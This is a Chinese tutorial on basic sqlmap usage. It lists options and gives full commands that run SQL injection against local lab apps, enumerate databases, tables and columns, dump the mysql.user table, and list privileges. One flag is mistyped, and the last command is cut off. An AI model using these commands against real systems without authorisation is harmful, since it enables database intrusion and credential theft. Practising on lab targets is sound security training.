sqlmap的基本使用

  Security

sqlmap帮助

--is-dba 当前用户权限(是否为root权限) 
--dbs 所有数据库 
--current-db 网站当前数据库 
--users 所有数据库用户 
--current-user 当前数据库用户 
--random-agent 采用随机User-Agent值 
--passwords 数据库密码 
--proxy http://localhost:8080 --threads 10(可以自定义线程加速)代理 
--time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒)
--batch 跳过所有默认选项
--user-agent 设置请求User-Agent值,默认是sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)

注入测试

不带cookie注入:

sqlmap -u "http://192.168.100.14/vul/sqli/sqli_str.php?name=2&submit=查询"

带cookie注入:

sqlmap -u "http://192.168.100.14:666/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=hegv2r23fij12buv1prk98jlkt;"

获取数据库所有库名:

sqlmap -u "http://192.168.100.14:666/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=hegv2r23fij12buv1prk98jlkt;" --dbs

获取数据库中的表名:

sqlmap -u "http://192.168.100.14/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -D mysql --tables

获取数据库中表的字段:

sqlmap -u "http://192.168.100.14/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -D mysql -T user -columns

获取数据库中表的值:

sqlmap -u "http://192.168.100.14/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -D mysql -T user -C 'user,host' --dump

获取数据库中用户的权限:

sqlmap -u "http://192.168.100.14/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --privileg